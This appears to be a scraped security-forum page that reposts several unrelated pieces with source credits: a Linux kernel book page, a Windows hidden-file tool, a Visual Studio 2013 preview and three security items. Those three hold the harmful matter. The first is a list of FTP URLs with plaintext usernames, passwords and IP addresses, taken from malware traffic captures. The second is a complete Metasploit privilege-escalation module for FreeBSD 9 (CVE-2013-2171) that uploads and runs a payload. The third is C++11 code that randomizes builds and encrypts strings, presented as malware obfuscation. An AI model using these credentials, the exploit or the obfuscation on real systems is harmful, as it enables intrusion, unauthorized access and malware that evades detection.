ftp://0lineage2-world:plokijuh@195.216.243.7 - F*ck this shit
ftp://expox@1:0628262733Y@188.40.138.148 - F*ck this shit
ftp://admin@enhanceviews.elementfx.com:123456@198.91.81.3 - F*ck this shit
ftp://ih_3676461:123456@209.190.85.253 - F*ck this shit
ftp://0alfa-go-cs:killer2612@195.216.243.45 - F*ck this shit
ftp://5nudapac:nudapac@195.216.243.82 - F*ck this shit
ftp://450857:6a5124c7@83.125.22.167 - F*ck this shit

I added the signatures manually by browsing the VirusTotal reports, but I got too many results, so I just left "F*ck this shit" on all of them. Crawling VirusTotal with the API could also be a way to retrieve results, but I'm lazy.

Looking at random pcaps, I found some fun things:

- Malware using a free hosting service is a bad idea:
- Malware built with wrong data (epic failure):
- Malware badly coded:
- Infecting yourself with Ardamax and enabling all its features is a bad idea:
- Another configuration failure:
- FTPs full of sh*t:

You can learn about actors, e.g. from dedmen2@176.9.52.231, emo boy (I've included him in the FTP list):

Protip: don't buy a Nikon Coolpix L14v1.0 - low quality pictures.

I also got some false positives; this one is fun because it's a server working against malware infections:

I have no idea why UsbFix was in a malware pack. Anyway, the use of the FTP protocol for legitimate tools is also a bad idea, and this is not the only "anti-malware" server I've found - I got some weird stuff for viral updates and many others. This technique is a double-edged sword, but most of the results lead to malware servers.

Posted by Steven K at 00:18

Sursa: XyliBox: Infiltrating malware servers without doing anything
-
Linux Kernel in a Nutshell

This is the web site for the book, Linux Kernel in a Nutshell, by Greg Kroah-Hartman, published by O'Reilly.

About

To quote the "official" O'Reilly site for the book:

"Written by a leading developer and maintainer of the Linux kernel, Linux Kernel in a Nutshell is a comprehensive overview of kernel configuration and building, a critical task for Linux users and administrators. No distribution can provide a Linux kernel that meets all users' needs. Computers big and small have special requirements that require reconfiguring and rebuilding the kernel. Whether you are trying to get sound, wireless support, and power management working on a laptop or incorporating enterprise features such as logical volume management on a large server, you can benefit from the insights in this book.

Linux Kernel in a Nutshell covers the entire range of kernel tasks, starting with downloading the source and making sure that the kernel is in sync with the versions of the tools you need. In addition to configuration and installation steps, the book offers reference material and discussions of related topics such as control of kernel options at runtime. A key benefit of the book is a chapter on determining exactly what drivers are needed for your hardware. Also included are recipes that list what you need to do to accomplish a wide range of popular tasks."

To quote me, the author of the book:

"If you want to know how to build, configure, and install a custom Linux kernel on your machine, buy this book. It is written by someone who spends every day building, configuring, and installing custom kernels as part of the development process of this fun, collaborative project called Linux. I'm especially proud of the chapter on how to figure out how to configure a custom kernel based on the hardware running on your machine. This is an essential task for anyone wanting to wring out the best possible speed and control of your hardware."

Audience

This book is intended to cover everything that is needed to know in order to properly build, customize, and install the Linux kernel. No programming experience is needed to understand and use this book. Some familiarity with how to use Linux, and some basic command-line usage, is expected of the reader. This book is not intended to go into the programming aspects of the Linux kernel; there are many other good books listed in the Bibliography that already cover this topic.

Secret Goal (i.e. why I wrote this book and am giving it away for free online)

I want this book to help bring more people into the Linux kernel development fold. The act of building a customized kernel for your machine is one of the basic tasks needed to become a Linux kernel developer. The more people that try this out, and realize that there is not any real magic behind the whole Linux kernel process, the more people will be willing to jump in and help out in making the kernel the best that it can be.

License

This book is available under the terms of the Creative Commons Attribution-ShareAlike 2.5 license. That means that you are free to download and redistribute it. The development of the book was made possible, however, by those who purchase a copy from O'Reilly or elsewhere.

Kernel version

The book is current as of the 2.6.18 kernel release; newer kernel versions will cause some of the configuration items to move around, and new configuration options will be added.
However, the main concepts in the book still apply to any kernel version released.

Downloads

The book is available for download in either PDF or DocBook format for the entire book, or by the individual chapter. The entire history of the development of the book (you too can see why the first versions of the book were 1000 pages long) can be downloaded in a git repository.

Linux Kernel in a Nutshell chapter files:

- Title page - PDF
- Copyright and credits - PDF
- Preface - PDF, DocBook
- Part I: Building the Kernel - PDF, DocBook
- Chapter 1: Introduction - PDF, DocBook
- Chapter 2: Requirements for Building and Using the Kernel - PDF, DocBook
- Chapter 3: Retrieving the Kernel Source - PDF, DocBook
- Chapter 4: Configuring and Building - PDF, DocBook
- Chapter 5: Installing and Booting from a Kernel - PDF, DocBook
- Chapter 6: Upgrading a Kernel - PDF, DocBook
- Part II: Major Customizations - PDF, DocBook
- Chapter 7: Customizing a Kernel - PDF, DocBook
- Chapter 8: Kernel Configuration Recipes - PDF, DocBook
- Part III: Kernel Reference - PDF, DocBook
- Chapter 9: Kernel Boot Command-Line Parameter Reference - PDF, DocBook
- Chapter 10: Kernel Build Command-Line Reference - PDF, DocBook
- Chapter 11: Kernel Configuration Option Reference - PDF, DocBook
- Part IV: Additional Information - PDF, DocBook
- Appendix A: Helpful Utilities - PDF, DocBook
- Appendix B: Bibliography - PDF, DocBook
- Index - PDF

Full Book Downloads:

- Tarball of all LKN PDF files (3MB)
- Tarball of all LKN DocBook files (1MB)

The git tree of the book source can be browsed at http://git2.kernel.org/git/?p=linux/kernel/git/gregkh/lkn.git. To clone this tree, run:

git clone git://git.kernel.org/pub/scm/linux/kernel/git/gregkh/lkn.git

Sursa: Linux Kernel in a Nutshell
-
[h=1]FreeBSD 9 Address Space Manipulation Privilege Escalation[/h]

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Local
  Rank = GreatRanking

  include Msf::Exploit::EXE
  include Msf::Post::Common
  include Msf::Post::File
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      {
        'Name'           => 'FreeBSD 9 Address Space Manipulation Privilege Escalation',
        'Description'    => %q{
          This module exploits a vulnerability that can be used to modify
          portions of a process's address space, which may lead to privilege
          escalation. Systems such as FreeBSD 9.0 and 9.1 are known to be
          vulnerable.
        },
        'License'        => MSF_LICENSE,
        'Author'         =>
          [
            'Konstantin Belousov', # Discovery
            'Alan Cox',            # Discovery
            'Hunger',              # POC
            'sinn3r'               # Metasploit
          ],
        'Platform'       => [ 'bsd' ],
        'Arch'           => [ ARCH_X86 ],
        'SessionTypes'   => [ 'shell' ],
        'References'     =>
          [
            [ 'CVE', '2013-2171' ],
            [ 'OSVDB', '94414' ],
            [ 'EDB', '26368' ],
            [ 'BID', '60615' ],
            [ 'URL', 'http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc' ]
          ],
        'Targets'        =>
          [
            [ 'FreeBSD x86', {} ]
          ],
        'DefaultTarget'  => 0,
        'DisclosureDate' => "Jun 18 2013",
      }
    ))

    register_options([
      # It isn't OptPath because it's a *remote* path
      OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
    ], self.class)
  end

  def check
    res = session.shell_command_token("uname -a")
    return Exploit::CheckCode::Appears if res =~ /FreeBSD 9\.[01]/
    Exploit::CheckCode::Safe
  end

  def write_file(fname, data)
    oct_data = "\\" + data.unpack("C*").collect {|e| e.to_s(8)} * "\\"
    session.shell_command_token("printf \"#{oct_data}\" > #{fname}")
    session.shell_command_token("chmod +x #{fname}")
    chk = session.shell_command_token("file #{fname}")
    return (chk =~ /ERROR: cannot open/) ? false : true
  end

  def upload_payload
    fname = datastore['WritableDir']
    fname = "#{fname}/" unless fname =~ %r'/$'
    if fname.length > 36
      fail_with(Exploit::Failure::BadConfig, "WritableDir can't be longer than 33 characters")
    end
    fname = "#{fname}#{Rex::Text.rand_text_alpha(4)}"
    p = generate_payload_exe
    f = write_file(fname, p)
    return nil if not f
    fname
  end

  def generate_exploit(payload_fname)
    #
    # Metasm does not support FreeBSD executable generation.
    #
    path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-2171.bin")
    x = File.open(path, 'rb') { |f| f.read(f.stat.size) }
    x.gsub(/MSFABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/, payload_fname.ljust(40, "\x00"))
  end

  def upload_exploit(payload_fname)
    fname = "/tmp/#{Rex::Text.rand_text_alpha(4)}"
    bin = generate_exploit(payload_fname)
    f = write_file(fname, bin)
    return nil if not f
    fname
  end

  def exploit
    payload_fname = upload_payload
    fail_with(Exploit::Failure::NotFound, "Payload failed to upload") if payload_fname.nil?
    print_status("Payload #{payload_fname} uploaded.")

    exploit_fname = upload_exploit(payload_fname)
    fail_with(Exploit::Failure::NotFound, "Exploit failed to upload") if exploit_fname.nil?
    print_status("Exploit #{exploit_fname} uploaded.")

    register_files_for_cleanup(payload_fname, exploit_fname)

    print_status("Executing #{exploit_fname}")
    cmd_exec(exploit_fname)
  end
end

Sursa: FreeBSD 9 Address Space Manipulation Privilege Escalation
-
Hidden File Finder is free software to quickly scan and discover all the hidden files on your Windows system.

It performs a swift multi-threaded scan of all the folders in parallel and quickly uncovers all the hidden files. It automatically detects hidden executable files (EXE, DLL, COM etc.) and shows them in red color for easier identification. Similarly, 'Hidden Files' are shown in black color and 'Hidden Folders' are shown in blue color.

One of its main features is the Unhide operation. You can select one or all of the discovered hidden files and unhide them with just a click. Successful unhide operations are shown in green background color, while failed ones are shown in yellow background.

It is very easy to use with its cool GUI interface. It will be particularly handy for penetration testers and forensic investigators. It is fully portable and works on both 32-bit & 64-bit platforms, from Windows XP to Windows 8.

Features

- Free, easy-to-use GUI based software
- Fast multi-threaded hidden file finder to quickly scan an entire computer, drive or folder
- Unhide all the hidden files with one click
- Color based representation of hidden files/folders/executable files and unhide operations
- Open the folder in Explorer by double clicking on the list
- Sort feature to arrange the hidden files based on name/size/type/date/path
- Detailed hidden file scan report in HTML format
- Fully portable and can be run from anywhere
- Also includes an installer for local installation/un-installation

Screenshots

[Screenshot 1: Hidden File Finder showing all the hidden files/folders discovered during the scan]
[Screenshot 2: Detailed HTML report of the hidden file scanning operation]

Release History

Version 1.0: 25th Jun 2013 - First public release of HiddenFileFinder

Download

FREE Download Hidden File Finder v1.0
License: Freeware
Platform: Windows XP, 2003, Vista, Windows 7, Windows 8

Sursa: Hidden File Finder : Free Tool to Find and Unhide/Remove all the Hidden Files | www.SecurityXploded.com
-
[h=1]Visual Studio 2013 Preview[/h]
By: Robert Green

Visual Studio 2013 Preview is here with lots of exciting new features across Windows Store, desktop and web development. Dmitry Lyalin joins Robert for a whirlwind tour of this preview of the next release of Visual Studio, which is now available for download.

Dmitry and Robert show the following in this episode:

Recap of Team Foundation Service announcements from TechEd [02:00], including Team Rooms for collaboration, code comments in changesets, mapping backlog items to features
IDE improvements [11:00], including more color and redesigned icons, undockable Pending Changes window, Connected IDE and synchronized settings
Productivity improvements [17:00], including CodeLens indicators showing references, changes and unit test results, enhanced scrollbar, Peek Definition for inline viewing of definitions
Web development improvements [28:00], including Browser Link for connecting Visual Studio directly to browsers, One ASP.NET
Debugging and diagnostics improvements [37:00], including edit and continue in 64-bit projects, managed memory analysis in memory dump files, Performance and Diagnostics hub to centralize analysis tools [44:00], async debugging [51:00]
Windows Store app development improvements, including new project templates [40:00], Energy Consumption and XAML UI Responsiveness analyzers [45:00], new controls in XAML and JavaScript [55:00], enhanced IntelliSense and Go To Definition in XAML files [1:00:00]

Visual Studio 2013 and Windows 8.1:
Visual Studio 2013 Preview download
Visual Studio 2013 Preview announcement
Windows 8.1 Preview download
Windows 8.1 Preview announcement

Additional resources:
Visual Studio team blog
Brian Harry's blog
ALM team blog
Web tools team blog
Modern Application Lifecycle Management talk at TechEd
Microsoft ASP.NET, Web, and Cloud Tools Preview talk at TechEd
Using Visual Studio 2013 to Diagnose .NET Memory Issues in Production
What's new in XAML talk at Build
What's new in WinJS talk at Build

Sursa: Visual Studio 2013 Preview | Visual Studio Toolbox | Channel 9
-
[h=1]Malware related compile-time hacks with C++11[/h]
by LeFF

Hello, community! This code shows how some features of the new C++11 standard can be used to randomly and automatically obfuscate code on every build you make (so every build will have different hash values, different encrypted strings and so on)... I decided to show examples of random code generation, string hashing and string encryption only, as more complex ones get much harder to read... The code is filled with comments and pretty self-explanatory, but if you have some questions, feel free to ask... Hope this stuff will be useful for you, guys!

#include <stdio.h>
#include <stdint.h>

//-------------------------------------------------------------//
// "Malware related compile-time hacks with C++11" by LeFF     //
// You can use this code however you like, I just don't really //
// give a shit, but if you feel some respect for me, please    //
// don't cut off this comment when copy-pasting... ;-)         //
//-------------------------------------------------------------//

// Usage examples:
void exampleRandom1() __attribute__((noinline));
void exampleRandom2() __attribute__((noinline));
void exampleHashing() __attribute__((noinline));
void exampleEncryption() __attribute__((noinline));

#ifndef vxCPLSEED
// If you don't specify the seed for the algorithms, the time when compilation
// started will be used; the seed changes the results of the algorithms...
#define vxCPLSEED ((__TIME__[7] - '0') * 1 + (__TIME__[6] - '0') * 10 + \
                   (__TIME__[4] - '0') * 60 + (__TIME__[3] - '0') * 600 + \
                   (__TIME__[1] - '0') * 3600 + (__TIME__[0] - '0') * 36000)
#endif

// The constantify template is used to make sure that the result of a constexpr
// function will be computed at compile-time instead of run-time
template <uint32_t Const> struct vxCplConstantify { enum { Value = Const }; };

// Compile-time mod of a linear congruential pseudorandom number generator,
// the actual algorithm was taken from the "Numerical Recipes" book
constexpr uint32_t vxCplRandom(uint32_t Id) { return (1013904223 + 1664525 * ((Id > 0) ? (vxCplRandom(Id - 1)) : (vxCPLSEED))) & 0xFFFFFFFF; }

// Compile-time random macros, can be used to randomize the execution
// path for separate builds, or for compile-time trash code generation
#define vxRANDOM(Min, Max) (Min + (vxRAND() % (Max - Min + 1)))
#define vxRAND() (vxCplConstantify<vxCplRandom(__COUNTER__ + 1)>::Value)

// Compile-time recursive mod of a string hashing algorithm,
// the actual algorithm was taken from the Qt library (this
// function isn't case sensitive due to vxCplTolower)
constexpr char vxCplTolower(char Ch) { return (Ch >= 'A' && Ch <= 'Z') ? (Ch - 'A' + 'a') : (Ch); }
constexpr uint32_t vxCplHashPart3(char Ch, uint32_t Hash) { return ((Hash << 4) + vxCplTolower(Ch)); }
constexpr uint32_t vxCplHashPart2(char Ch, uint32_t Hash) { return (vxCplHashPart3(Ch, Hash) ^ ((vxCplHashPart3(Ch, Hash) & 0xF0000000) >> 23)); }
constexpr uint32_t vxCplHashPart1(char Ch, uint32_t Hash) { return (vxCplHashPart2(Ch, Hash) & 0x0FFFFFFF); }
constexpr uint32_t vxCplHash(const char* Str) { return (*Str) ? (vxCplHashPart1(*Str, vxCplHash(Str + 1))) : (0); }

// Compile-time hashing macro, hash values change using the first pseudorandom number in the sequence
#define vxHASH(Str) (uint32_t)(vxCplConstantify<vxCplHash(Str)>::Value ^ vxCplConstantify<vxCplRandom(1)>::Value)

// Compile-time generator for a list of indexes (0, 1, 2, ...)
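// (This is the classic pre-C++14 emulation of std::index_sequence:
// vxCplIndexes<N> appends N - 1 to vxCplIndexes<N - 1> until it bottoms
// out at the empty list, so vxCplIndexes<3>::Result is
// vxCplIndexList<0, 1, 2>. The encryption class further below expands
// these indexes in a pack expansion to transform every character of a
// string literal at compile time.)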
template <uint32_t...> struct vxCplIndexList {};
template <typename IndexList, uint32_t Right> struct vxCplAppend;
template <uint32_t... Left, uint32_t Right> struct vxCplAppend<vxCplIndexList<Left...>, Right> { typedef vxCplIndexList<Left..., Right> Result; };
template <uint32_t N> struct vxCplIndexes { typedef typename vxCplAppend<typename vxCplIndexes<N - 1>::Result, N - 1>::Result Result; };
template <> struct vxCplIndexes<0> { typedef vxCplIndexList<> Result; };

// Compile-time string encryption of a single character
const char vxCplEncryptCharKey = vxRANDOM(0, 0xFF);
constexpr char vxCplEncryptChar(const char Ch, uint32_t Idx) { return Ch ^ (vxCplEncryptCharKey + Idx); }

// Compile-time string encryption class
template <typename IndexList> struct vxCplEncryptedString;
template <uint32_t... Idx> struct vxCplEncryptedString<vxCplIndexList<Idx...> > {
    char Value[sizeof...(Idx) + 1]; // Buffer for a string

    // Compile-time constructor
    constexpr inline vxCplEncryptedString(const char* const Str) : Value({ vxCplEncryptChar(Str[Idx], Idx)... }) {}

    // Run-time decryption
    char* decrypt() {
        for(uint32_t t = 0; t < sizeof...(Idx); t++) {
            this->Value[t] = this->Value[t] ^ (vxCplEncryptCharKey + t);
        }
        this->Value[sizeof...(Idx)] = '\0';
        return this->Value;
    }
};

// Compile-time string encryption macro
#define vxENCRYPT(Str) (vxCplEncryptedString<vxCplIndexes<sizeof(Str) - 1>::Result>(Str).decrypt())

// A small random code path example
void exampleRandom1() {
    switch(vxRANDOM(1, 4)) {
        case 1: { printf("exampleRandom1: Code path 1!\n"); break; }
        case 2: { printf("exampleRandom1: Code path 2!\n"); break; }
        case 3: { printf("exampleRandom1: Code path 3!\n"); break; }
        case 4: { printf("exampleRandom1: Code path 4!\n"); break; }
        default: { printf("Fucking poltergeist!\n"); }
    }
}

// A small random code generator example
void exampleRandom2() {
    volatile uint32_t RndVal = vxRANDOM(0, 100);

    if(vxRAND() % 2) {
        RndVal += vxRANDOM(0, 100);
    } else {
        RndVal -= vxRANDOM(0, 200);
    }

    printf("exampleRandom2: %d\n", RndVal);
}

// A small string hashing example
void exampleHashing() {
    printf("exampleHashing: 0x%08X\n", vxHASH("hello world!"));
    printf("exampleHashing: 0x%08X\n", vxHASH("HELLO WORLD!"));
}

// A small string encryption example
void exampleEncryption() {
    printf("exampleEncryption: %s\n", vxENCRYPT("Hello world!"));
}

extern "C" void Main() {
    exampleRandom1();
    exampleRandom2();
    exampleHashing();
    exampleEncryption();
}

To build the code with GCC/MinGW I used this command:

g++ -o main.exe -m32 -std=c++0x -Wall -O3 -Os -fno-exceptions -fno-rtti -flto -masm=intel -e_Main -nostdlib -O3 -Os -flto -s main.cpp -lmsvcrt

The compiled binary returns this, as expected:

exampleRandom1: Code path 2!
exampleRandom2: 145
exampleHashing: 0x2D13947A
exampleHashing: 0x2D13947A
exampleEncryption: Hello world!

Decompiled code that was generated by the compiler:

exampleRandom1 proc near
var_18= dword ptr -18h

push ebp
mov ebp, esp
sub esp, 18h
mov [esp+18h+var_18], offset aExamplerandom1 ; "exampleRandom1: Code path 2!"
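; Note: the entire switch from exampleRandom1 has been folded away here.
; vxRANDOM(1, 4) was resolved to the constant 2 at compile time, so the
; compiler eliminated the dead branches and reduced the function to a
; single puts call with the "Code path 2" string.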
call puts
leave
retn
exampleRandom1 endp

exampleRandom2 proc near
var_28= dword ptr -28h
var_24= dword ptr -24h
var_C= dword ptr -0Ch

push ebp
mov ebp, esp
sub esp, 28h
mov [ebp+var_C], 78
mov eax, [ebp+var_C]
mov [esp+28h+var_28], offset aExamplerandom2 ; "exampleRandom2: %d\n"
add eax, 67
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
mov [esp+28h+var_24], eax
call printf
leave
retn
exampleRandom2 endp

exampleHashing proc near
var_18= dword ptr -18h
var_14= dword ptr -14h

push ebp
mov ebp, esp
sub esp, 18h
mov [esp+18h+var_14], 2D13947Ah
mov [esp+18h+var_18], offset aExamplehashing ; "exampleHashing: 0x%08X\n"
call printf
mov [esp+18h+var_14], 2D13947Ah
mov [esp+18h+var_18], offset aExamplehashing ; "exampleHashing: 0x%08X\n"
call printf
leave
retn
exampleHashing endp

exampleEncryption proc near
var_28= dword ptr -28h
var_24= dword ptr -24h
var_15= byte ptr -15h
var_14= byte ptr -14h
var_13= byte ptr -13h
var_12= byte ptr -12h
var_11= byte ptr -11h
var_10= byte ptr -10h
var_F= byte ptr -0Fh
var_E= byte ptr -0Eh
var_D= byte ptr -0Dh
var_C= byte ptr -0Ch
var_B= byte ptr -0Bh
var_A= byte ptr -0Ah
var_9= byte ptr -9

push ebp
xor eax, eax
mov ebp, esp
mov ecx, 0Dh
push edi
lea edi, [ebp+var_15]
sub esp, 24h
rep stosb
xor eax, eax
mov [ebp+var_15], 4Ah
mov [ebp+var_14], 66h
mov [ebp+var_13], 68h
mov [ebp+var_12], 69h
mov [ebp+var_11], 69h
mov [ebp+var_10], 27h
mov [ebp+var_F], 7Fh
mov [ebp+var_E], 66h
mov [ebp+var_D], 78h
mov [ebp+var_C], 67h
mov [ebp+var_B], 68h
mov [ebp+var_A], 2Ch

loc_401045:
lea ecx, [eax+2]
xor [ebp+eax+var_15], cl
inc eax
cmp eax, 0Ch
lea edx, [ebp+var_15]
jnz short loc_401045
mov [esp+28h+var_24], edx
mov [esp+28h+var_28], offset aExampleencrypt ; "exampleEncryption: %s\n"
mov [ebp+var_9], 0
call printf
add esp, 24h
pop edi
pop ebp
retn
exampleEncryption endp

[h=4]Attached Files[/h]
main.rar (650 bytes)

Sursa: Malware related compile-time hacks with C++11 - rohitab.com - Forums
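One last observation on the post above (this check is my addition, not LeFF's): because vxCplHash is constexpr, it can feed a static_assert, which both proves the hashing happens entirely at compile time and documents the case-insensitivity seen in the exampleHashing output:

// Hypothetical self-check building on the vxCplHash definition above:
// if this line compiles, the hash was evaluated as a constant expression
// at build time, and vxCplTolower made it case-insensitive.
static_assert(vxCplHash("hello world!") == vxCplHash("HELLO WORLD!"),
              "compile-time hash should be case-insensitive");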